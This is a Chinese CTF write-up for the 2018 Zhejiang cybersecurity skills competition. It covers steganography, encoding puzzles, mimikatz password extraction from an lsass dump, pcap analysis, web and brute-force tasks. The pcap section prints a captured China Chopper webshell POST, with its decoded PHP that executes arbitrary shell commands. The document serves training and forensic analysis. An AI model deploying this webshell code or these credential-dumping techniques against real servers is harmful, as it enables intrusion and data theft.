2018年浙江省网络安全技能竞赛ctf部分解题思路writeup

ctf题目链接: https://pan.baidu.com/s/1pKgkFblaz0Vpvr_elkBEkA 密码: 5dtc

一、隐写题

1. key.exe

用binwalk -e key.exe提取文件

打开3F600.rar压缩包

2. 老鹰抓小鸡

这题考察的是bmp图片文件高度隐写，用010editor编辑器修改图片高度为-510另存为一张图片

tip：bmp高度正为倒向位图高度为负为正向位图

二、密码学

1. 这个EXE好像被加密了

用hxd编辑器打开haha.exe文件发现右侧字符以等号结尾应该是base64编码

通过python脚本解码后得到

base64格式图片直接复制到浏览器打开是一张二维码图片

保存为图片本地用QR_Research打开

2. 看着是不是很眼熟

题目：

=E4=B8=89=E5=B8=9D=E4=BA=94=E5=B8=81=E4=B8=83=E6=98=93=E6=81=A9=E5=85=AD

=E5=93=A6=E8=BE=9F=E6=9B=BF=E4=BC=98=E5=85=AB=E5=BE=AE=E5=A4=96=E4=B9=9D

网上搜到是Quoted-Printable编码
http://www.mxcz.net/tools/quotedprintable.aspx 在线解码
三帝五币七易恩六
哦辟替优八微外九

把数字和英文发音首字母组合下得到key{3D5B7EA6OPTU8VY9}

三、系统密码破解

黑客攻击了一台windows2003的服务器，从拖出来了它的lsass进程内存镜像，你能从该镜像中获取管理员的密码吗？

管理员密码即为key！

把解压出的LSASS.DUMP在windows2003 用mimikatz打开

四、数据包分析

用wireshare打开wire.pcapng数据包，执行http.request.method==”POST”过滤http post

逐个数据包单击右键选择“Follow TCP Stream”来查看TCP数据流，发现最后一条记录（编号为41）的TCP数据流有Rar!标记这里通过菜刀POST往服务器上传了一个rar数据包，我们通过Save As按钮把数据包Dump出来，如下图所示：

提取数据包保存为rar文件是一个加密的图片

RAR文件是通过POST数据包上传文件内容的，抓包记录编号为41，压缩时添加的密码肯定在41之前的POST数据包进行分析，选中编号18这条POST记录，单击右键选择“Follow TCP Stream”来查看TCP数据流

先使用Converter对POST参数进行Unescape解码

解码后得到

pass=(@$_E=CREATE._FUNC.TION).($_S=@$_E(NULL,EV.(C&E).L.(a^I).BAS.E64_DE.code.(a^I).(a^E)._POST.(a|Z).z0.(d|Y).(a^H).(a^H).(n^U))).$_S();&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oJy0+fCcpOyRwPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MSJdKTskcz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI/Ii1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRyZXQ9MTt0cnl7QHN5c3RlbSgkci4nIDI+JjEnLCRyZXQpO2lmKCRyZXQhPTApQHBhc3N0aHJ1KCRyLicgMj4mMScsJHJldCk7aWYoJHJldCE9MCl7JHo9QHNoZWxsX2V4ZWMoJHIuJyAyPiYxJyk7JHJldD0odHJpbSgkeik9PScnKT8xOjA7ZWNobygkeik7fWlmKCRyZXQhPTApe0BleGVjKCRyLicgMj4mMScsJHosJHJldCk7ZWNobygkej1qb2luKHN1YnN0cigkZCwwLDEpPT0nLyc/IlxuIjoiXHJcbiIsJHopKTt9aWYoJHJldCE9MCl7JGE9YXJyYXkoYXJyYXkoJ3BpcGUnLCdyJyksYXJyYXkoJ3BpcGUnLCd3JyksYXJyYXkoJ3BpcGUnLCd3JykpOyRmcD1AcHJvY19vcGVuKCRyLicgMj4mMScsJGEsJHBpKTskej1zdHJlYW1fZ2V0X2NvbnRlbnRzKCRwaVsxXSk7JHJldD0odHJpbSgkeik9PScnKT8xOjA7ZWNobygkeik7QHByb2NfY2xvc2UoJGZwKTt9aWYoJHJldCE9MCl7aWYoKCRmcD1AcG9wZW4oJHIuJyAyPiYxJywncicpKSE9RkFMU0UpeyR6PScnO3doaWxlKCFmZW9mKCRmcCkpeyR6Lj1mZ2V0cygkZnApO30kcmV0PSh0cmltKCR6KT09JycpPzE6MDtlY2hvKCR6KTtAcGNsb3NlKCRmcCk7fX1pZigkcmV0IT0wJiZzdWJzdHIoJGQsMCwxKSE9Ii8iJiZjbGFzc19leGlzdHMoJ0NPTScpKXskdz1uZXcgQ09NKCdXU2NyaXB0LnNoZWxsJyk7JG09JHctPmV4ZWMoJHIuJyAyPiYxJyk7JGY9JG0tPlN0ZE91dCgpOyR6PSRmLT5SZWFkQWxsKCk7JHJldD0odHJpbSgkeik9PScnKT8xOjA7ZWNobygkeik7fX1jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gJyBNZXNzYWdlOiAnLiRlLT5nZXRNZXNzYWdlKCk7fXByaW50ICgkcmV0IT0wKT8icmV0PXskcmV0fSI6Jyc7ZXhpdCgnfDwtJyk7&z1=Y21k&z2=Y2QgL2QgIkM6XHBocFxodGRvY3MiJndpbnJhciBhIC1wa0BlI3kxMDIwIGtleS5yYXIga2V5LmpwZyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==

把z0参数放到文本用python进行Base64解码，得到参数z0的数据为：

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo('->|');$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$ret=1;try{@system($r.' 2>&1',$ret);if($ret!=0)@passthru($r.' 2>&1',$ret);if($ret!=0){$z=@shell_exec($r.' 2>&1');$ret=(trim($z)=='')?1:0;echo($z);}if($ret!=0){@exec($r.' 2>&1',$z,$ret);echo($z=join(substr($d,0,1)=='/'?"\n":"\r\n",$z));}if($ret!=0){$a=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));$fp=@proc_open($r.' 2>&1',$a,$pi);$z=stream_get_contents($pi[1]);$ret=(trim($z)=='')?1:0;echo($z);@proc_close($fp);}if($ret!=0){if(($fp=@popen($r.' 2>&1','r'))!=FALSE){$z='';while(!feof($fp)){$z.=fgets($fp);}$ret=(trim($z)=='')?1:0;echo($z);@pclose($fp);}}if($ret!=0&&substr($d,0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$m=$w->exec($r.' 2>&1');$f=$m->StdOut();$z=$f->ReadAll();$ret=(trim($z)=='')?1:0;echo($z);}}catch(Exception $e){echo ' Message: '.$e->getMessage();}print ($ret!=0)?"ret={$ret}":'';exit('|<-');蟅6諰鯿d /d "C:\php\htdocs"&winrar a -pk@e#y1020 key.rar key.jpg&echo [S]&cd&echo [E]

这里通过Rar的命令行将C:\php\htdocs\key.jpg打包成key.rar文件，且指定了-pk@e#y1020 ，-p参数后面内容就是压缩包的密码

五、web

1. 源码被我藏起来了，看你能不能找到!

通过awvs扫描发现存在test.php页面

打开http://101.101.101.110/stage/11/test.php有个base64编码

YToyOntzOjQ6ImZ1bmMiO3M6MTI6ImdldF9jb250ZW50cyI7czo0OiJtYWluIjtzOjc6ImtleS5waHAiO30=

解码后

a:2:{s:4:"func";s:12:"get_contents";s:4:"main";s:7:"key.php";}

2. 爆破

题目：

这里有一组信息，你需要自己制作密码字典进行爆破
用户名：小明
用户出生日期：1997-04-18
用户邮箱:xm123@163.com
用户手机号码:13858987452

用户QQ号：48956347

用亦思想社会工程学字典生成器构造字典

后台用户名是admin，然后用pkav破解带验证的后台

六、数据恢复

用DiskGenius打开hdd.vhd虚拟硬盘文件，点恢复文件后压缩包和照片类没找到key关键文件

2018年浙江省网络安全技能竞赛ctf部分解题思路writeup相关推荐

2020湖南省技能竞赛获奖名单_雄安新区网络安全技能竞赛举办！9人获奖！
7月29日,2020年河北省职工职业技能大赛(网络信息安全管理员工种)暨"冀信2020"网络安全技能竞赛雄安新区地区赛通过线上竞赛的方式成功举办. 竞赛主办方相关负责人到大赛现场观 ...
2022浙江省网络安全技能赛决赛
2022浙江省网络安全技能赛决赛 PWN Hodgepodge RE ezandroid Crypto math rsa NTRU MISC checkin_gift m4a 欢迎来玩嘤嘤嘤 PWN ...
移动网络安全_徐州市2020年“移动杯”网络安全技能竞赛圆满落幕
为进一步宣传普及<网络安全法>,提升企事业单位人员一线网络安全预防.监测和应对处置技能,10月23日下午,由市委网信办.市工信局.市人社局主办,中国移动徐州分公司承办的徐州市2020年&q ...
【阿尼亚不会CTF】第六届”蓝帽杯“全国大学生网络安全技能大赛—线上初赛部分writeup
啊!!!蓝帽杯第一次加入取证模块呢,取证静态分,CTF动态分,这波是出道即C位,完全挤掉CTF,属于被迫做取证题惹~ 菜鸟阿尼亚会做的题不多,以后也要继续加油哦!!! (点名计算机取证出题人--某某某 ...
2021年第二届“大湾区杯”粤港澳金融建模竞赛B题解题思路和部分代码
概要: 金融建模类的竞赛难度真的很大,其数据处理程度堪比大数据类比赛:其建模能力要求堪比深圳杯,编程能力要求堪比含金量普通或中上的算法比赛.还需要有及其扎实的金融知识背景(没错,我不会.我就一计算机专 ...
2023年中职网络安全技能竞赛网页渗透(审计版)
三.竞赛任务书内容 (一)拓扑图网页渗透测试任务环境说明: 服务器场景:Server2127 服务器场景操作系统:未知(封闭靶机) 用户名:未知密码:未知访问服务器网站目录1,根据页面信息完成 ...
2023年中职网络安全技能竞赛网络安全事件响应解析(保姆级)
B-4:网络安全事件响应任务环境说明: 服务器场景:Server22(开放链接) 用户名:root密码:123456 黑客通过网络攻入本地服务器,通过特殊手段在系统中建立了多个异常进程,找出启动异常 ...
2023中职组网络安全技能竞赛——代码审计解析（超级详细）
代码审计:需求环境可私信博主任务环境说明: 服务器场景:PYsystem0035 服务器场景操作系统:未知服务器场景用户名:未知密码:未知在渗透机Kali Linux中访问靶机服务器Web页面 ...
2023中职网络安全技能竞赛新题
B-8:Linux操作系统渗透测试任务环境说明: ✓ 服务器场景:Server2380(关闭链接) ✓ 服务器场景操作系统:未知 ✓ 用户名:未知密码:未知 1. 找出Apache的版本号作为Fl ...

2018年浙江省网络安全技能竞赛ctf部分解题思路writeup

2018年浙江省网络安全技能竞赛ctf部分解题思路writeup相关推荐

最新文章

热门文章